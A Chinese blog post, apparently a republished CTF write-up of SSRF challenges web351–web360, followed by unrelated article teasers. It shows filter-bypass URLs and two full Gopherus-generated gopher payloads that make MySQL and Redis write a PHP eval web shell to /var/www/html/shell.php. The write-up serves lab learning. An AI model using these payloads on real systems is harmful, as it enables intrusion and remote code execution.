当前位置：首页 > news >正文

CTFHUB SSRF

news 文章来源：https://blog.csdn.net/m0_64180167/article/details/133619328 2025/1/21 1:00:21

web351

编辑 web352

web353

web354 sudo.cc 代表 127

web355 host长度

web356

web357 DNS 重定向

web358 @bypass

web359 mysql ssrf

web360

web351

POST查看 flag.php即可

web352

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{die('hacker');
}
}
else{die('hacker');
}

我们看看过滤了 localhost 和 127.0.0.1

并且需要存在 http

所以我们传入payload

url=http://0177.0.0.1/flag.php

这里是八进制的 127

web353

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{die('hacker');
}
}
else{die('hacker');
}

过滤了 127.0.0.1

我们可以通过 0 来绕过

payload

url=http://0/flag.php

web354 sudo.cc 代表 127

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{die('hacker');
}
}
else{die('hacker');
}

0 1 127 都被过滤了

这里确实学到了

http://sudo.cc 指向的就是 127.0.0.1

我们直接使用这个payload

http://sudo.cc/flag.php

web355 host长度

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{die('hacker');
}
}
else{die('hacker');
}

没有过滤但是 host需要为小于5

payload

url=http://0/flag.php

看wp还存在一个解法

http://127.1/flag.php

web356

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{die('hacker');
}
}
else{die('hacker');
}
?> hacker

长度小于3

这里只能使用

http://0/flag.php

web357 DNS 重定向

我们这里首先会判断是不是私有ip

这样我们之前的数字ip bypass就是失效了

这里我们可以使用DNS 重定向 bypass

rbndr.us dns rebinding service

这里设置一个不是私有的ip

url=http://7f000001.774bd96d.rbndr.us/flag.php

web358 @bypass

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){echo file_get_contents($url);
}

这里需要出现这内容才会输出

我们来看看

我们通过 @ 来绕过

http://ctf.@127.0.0.1/flag.php?show

这里 @ 后还是解析为 127.0.0.1 并且结尾是 show

web359 mysql ssrf

首先开局一个登录

我们看看源代码

发现有一个 hidden 元素这里是被隐藏了并且值已经设定为 url 了这里要敏感了因为 SSRF 就是引用其他url

我们随便写一个抓包看看

发现 POST内容中传递了 returl值

我们修改为百度看看

确实存在 ssrf

没有找到 flag.php

我们因为通过登入我们可以想到数据库那我们直接通过 gopher 攻击mysql即可

我们使用工具

py2 .\gopherus.py --exploit mysql

将 payload 再进行一次 url编码

gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254f%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2527%2563%256d%2564%2527%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2573%2568%2565%256c%256c%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

然后进行传递

然后通过蚁剑链接即可

web360

找不到 flag.php

我们开始通过 dict 探测端口

url=dict://127.0.0.1:80

发现开放了 6379端口这里是 redis的端口这里很明显就是让我们攻击了

我们一样去工具实现攻击

gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252431%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2540%2524_POST%255Bcmd%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

总的来说 show的ssrf 还挺简单的这里学到了 sudo.cc的内容

CTFHUB SSRF

目录 web351 编辑 web352 web353 web354 sudo.cc 代表 127 web355 host长度 web356 web357 DNS 重定向 web358 bypass web359 mysql ssrf web360 web351 POST查看 flag.php即可 web352 <?php error_reporting(0); highlight_file(__FILE__); $url$_…...

编程日记 2023/10/7 8:17:20

FreeRTOS入门教程（队列详细使用示例）

文章目录前言一、队列基本使用二、如何分辨数据源三、传输大块数据总结前言上篇文章我们已经讲解了队列的概念和队列相关的API函数，那么本篇文章的话就开始带大家来学习使用队列。一、队列基本使用这个例子将会创建三个任务，其中两个任务用来发送…...

编程日记 2023/10/7 8:16:19

【Kafka专题】Kafka收发消息核心参数详解

目录前置知识课程内容一、从基础的客户端说起（Java代码集成使用）1.1 消息发送者源码示例1.2 消息消费者源码示例1.3 客户端使用小总结 *二、从客户端属性来梳理客户端工作机制*2.1 消费者分组消费机制2.2 生产者拦截器机制2.3 消息序列化机制2.4 消息分…...

编程日记 2023/10/7 8:15:17

matlab 使用激光雷达检测、分类和跟踪车辆

目录 1、算法概述2、加载数据3、地平面分割4、语义分割5、聚类和边界盒拟合6、可视化设置7、循环遍历数据8、面向跟踪的包围盒9、总结10、支持功能11、参考</...

编程日记 2023/10/7 8:13:15

代码随想录训练营二刷第四十八天 | 139.单词拆分背包问题总结

代码随想录训练营二刷第四十八天 | 139.单词拆分背包问题总结一、139.单词拆分题目链接：https://leetcode.cn/problems/word-break/ 思路：单词拼字符串，完全背包。定义dp[i]，为true表示可以拆分为一或多个单词。可能会出现ab…...

编程日记 2023/10/7 8:11:12

【数据挖掘】2017年 Quiz 1-3 整理带答案

目录 Quiz 1Quiz 2Quiz 3Quiz 1 Answer Problems 1-2 based on the following training set, where A , B , C A, B, C A,B,</...

编程日记 2023/10/7 8:10:11

吃鸡高手必备工具大揭秘！提高战斗力，分享干货，一站满足！

大家好！你是否想提高吃鸡游戏的战斗力，分享顶级的游戏作战干货，方便进行吃鸡作图和查询装备皮肤库存？是否也担心被骗，希望查询游戏账号是否在黑名单上，或者查询失信人和VAC封禁情况？在这段视频中…...

编程日记 2023/10/7 8:09:10

集群化环境前置准备

目录部署 1. 配置多台Linux虚拟机 1.1 首先，关机当前CentOS系统虚拟机（可以使用root用户执行init 0来快速关机） 1.2 新建文件夹 1.3 克隆 1.4 同样的操作克隆出：node2和node3 1.5 开启node1，修改主机名为node1&…...

编程日记 2023/10/7 8:07:09

nodejs开发环境搭建

Nodejs是一个开源的、跨平台JavaScript运行时环境，其使用V8引擎对JavaScript脚本执行解释，在前后端分离的应用架构设计中，其既能支持web页面服务应用的开发、也能支持后端接口服务应用的开发，类似于Java语言的J2EE运行时环境&…...

编程日记 2023/10/7 8:06:08

C语言qsort函数

排序qsort int int cmp(const void *a, const void *b) {return *(int *)a - *(int *)b;//先强转成int型，后解引用取值比较大小 }字符串数组 char a[] “hello world” //字符串数组，存放的是字符 int cmp(const void *a, const void *b) {return *(…...

编程日记 2023/10/7 8:04:05

如何使用 Hotshot 通过文字生成 GIF 动画

Hotshot 是一个基于人工智能的工具，可用于通过文字生成 GIF 动画。该工具使用最新的图像生成技术来创建逼真的动画，即使是复杂的文字描述也能做到。 hotshot访问地址使用 Hotshot 生成 GIF 动画要使用 Hotshot 生成 GIF 动画，您需要首先…...

编程日记 2023/10/7 8:03:04

吃鸡高手必备！这些技巧帮你提高战斗力！

大家好！作为一名吃鸡玩家，我们都想提高自己的战斗力，享受顶级游戏作战干货，装备皮肤库存展示和查询，并避免被骗游戏账号。在这里，我将为大家介绍一些实用的技巧和工具，让你成为吃鸡高手&#xf…...

编程日记 2023/10/7 7:56:57

XV6 操作系统实验

环境搭建 ubuntu 新建一个文件setup.sh，内容如下 #获取工具链 git clone --recursive https://github.com/riscv/riscv-gnu-toolchain #安装必要依赖 sudo apt-get update sudo apt-get install autoconf automake autotools-dev curl libmpc-dev libmpfr-dev li…...

编程日记 2023/10/7 7:53:54

leetcode - 双周赛114

一，2869.收集元素的最小操作次数 // 解法：哈希表从右往左遍历 class Solution {public int minOperations(List<Integer> nums, int k) {Set<Integer> set new HashSet<>();for(int i1; i<k; i){set.add(i);}for(int inums.size…...

编程日记 2023/10/7 7:52:53

【LeetCode刷题笔记】双指针

剑指 Offer 21.调整数组顺序使奇数位于偶数前面解题思路： 对撞指针 ， 从左边不停的找第一个偶数，从右边不停的找第一个奇数 ，找到后交换两者位置本题与【905. 按奇偶排序数组】几乎雷同。剑指 Offer 57.和为s的两个数字本题…...

编程日记 2023/10/7 7:51:52

互联网Java工程师面试题·Memcached 篇·第二弹

目录 10、memcached 如何实现冗余机制？ 11、memcached 如何处理容错的？ 12、如何将 memcached 中 item 批量导入导出？ 13、如果缓存数据在导出导入之间过期了，您又怎么处理这些数据呢？ 14、memcached 是如何做身份…...

编程日记 2023/10/7 7:49:50

特斯拉被称为自动驾驶领域的苹果

特斯拉的自动驾驶技术无疑是居于世界上领先地位的，有人形容特斯拉是自动驾驶汽车领域的苹果。特斯拉发布的Tesla Vision系统只配备了摄像头，不依靠雷达。这并不是特斯拉唯一和其它对手不同的地方，他们的整个战略都是基于车队和销售产品，而其大多数竞争对手则销售自…...

编程日记 2023/10/7 7:47:48

stm32之HAL库操作PAJ75620

一、模块简介手势模块PAJ7620主要利用IIC或SPI协议来实现数据的传输，本实验用的模块是以IIC来进行信息传输。支持电压从2.8v到3.6v, 正常可以选择3.3v。检测的距离从5到15cm, 可以检测9种手势，包括右：编码为 0x01左：编码为 0x0…...

编程日记 2023/10/7 7:43:43

医学影像归档与通讯系统（PACS）系统源码 PACS三维图像后处理技术

医学影像归档与通讯系统（PACS）系统源码 PACS三维图像处理医学影像归档与通讯系统（PACS）系统，是一套适用于从单一影像设备到放射科室、到全院级别等各种应用规模的医学影像归档与通讯系统。PACS集患者登记、图像采集、…...

编程日记 2023/10/7 7:41:40

web漏洞-PHP反序列化

目录 PHP反序列化序列化反序列化原理涉及技术利用危害CTF靶场 PHP反序列化序列化将对象转换成字符串反序列化相反，将字符串转换成对象。数据格式的转换对象的序列化有利于对象的保存和传输，也可以让多个文件共享对象。原理未对用户输入的序列化字…...

编程日记 2023/10/7 7:40:39

Redis-分布式锁

分布式锁相关内容超卖问题切入可以使用互斥锁给先获取到锁的线程加锁吗？使用redis分布式锁解决超卖问题setnx命令实现分布式锁为什么需要设置过期时间？Redis实现分布式锁如何合理控制锁的有效时长 redisson实现分布式锁超卖问题切入我们先来看一个项目…...

编程日记 2023/10/7 7:33:32

什么时候使用继承，好莱坞原则（设计模式与开发实践 P11+）

文章目录好莱坞原则真的需要继承吗？ 好莱坞原则如果你熟悉继承方法、乃至模板方法模式后，就可以了解一个设计原则好莱坞原则新人演员把简历发给好莱坞，许久之后没有回应不耐烦打电话给好莱坞，只收到回应：不要来找…...

编程日记 2023/10/7 7:32:31

蓝桥等考Python组别十四级001

第一部分：选择题 1、Python L14 （15分） 运行下面程序，输出的结果是（ ）。 d {A: 501, B: 602, C: 703, D: 804} print(d[B]) 501602703804 正确答案：B 2、Python L14 （15分…...

编程日记 2023/10/7 7:30:30

TI单芯片毫米波雷达代码走读（二十七）—— 角度维（3D）处理之通道间幅相一致性补偿

TI单芯片毫米波雷达1642代码走读（〇）——总纲书接上回，我们知晓了3D处理的主要流程，相信大家都已理解基本的原理。在正式进行数据分析之前还有一步关键的步骤需要说明，即通道间的幅相一致性补偿问题。细心的朋友可能注意到，在3D处理的的原码中有两个函数我一直没有讲：…...

编程日记 2023/10/7 7:25:25

数据结构 2.2 单循环链表

2.单循环链表 data|next——>data|next——>data|next——>头节点 1.初始化链表 2.增加节点（头插法、尾插法） 3.删除节点 4.遍历链表定义一个结构体，存放data域和指针域： typedef struct Node {//定义一个结构体&…...

编程日记 2023/10/7 7:24:24

矩阵距离——多源BFS

给定一个 N 行 M 列的 01 矩阵 A，A[i][j] 与 A[k][l] 之间的曼哈顿距离定义为： dist(A[i][j],A[k][l])|i−k||j−l| 输出一个 N 行 M 列的整数矩阵 B，其中：B[i][j]min1≤x≤N,1≤y≤M,A[x][y]1dist(A[i][j],A[x][y]) 输入格式第…...

编程日记 2023/10/7 7:22:23

关于在 Notion 中使用 Markdown 语法

关于在 Notion 中使用 Markdown 语法习惯使用的 Markdown 的伙伴们应该知道，当需要加粗字体时，会首先输入 ** **，然后在里面填内容。但是在 Notion 中，这个就不太行了。它所定义的规则是从前往后，也就是先键入**&…...

编程日记 2023/10/7 7:20:21

sigmoid和softmax函数有什么区别

Sigmoid函数和Softmax函数都是常用的激活函数，但它们的主要区别在于应用场景和输出结果的性质。 Sigmoid函数（也称为 Logistic函数）： Sigmoid函数将输入值映射到0到1之间的连续实数范围，通常用于二元分类问题。 Si…...

编程日记 2023/10/7 7:15:16

第五章：最新版零基础学习 PYTHON 教程—Python 字符串操作指南（第七节 - Python 中使用 % 进行字符串格式化）

在Python中，可以通过不同的方法来实现对字符串所需的格式化。他们之中有一些是; 1) 使用 % 2) 使用 {} 3)使用模板字符串本文讨论使用 % 进行格式化。使用 % 的格式类似于 C 编程语言中的“printf”。%d – 整数 %f – 浮点数 %s – 字符串 %x – 十六进制 %o – 八进制下面的…...

编程日记 2023/10/7 7:09:10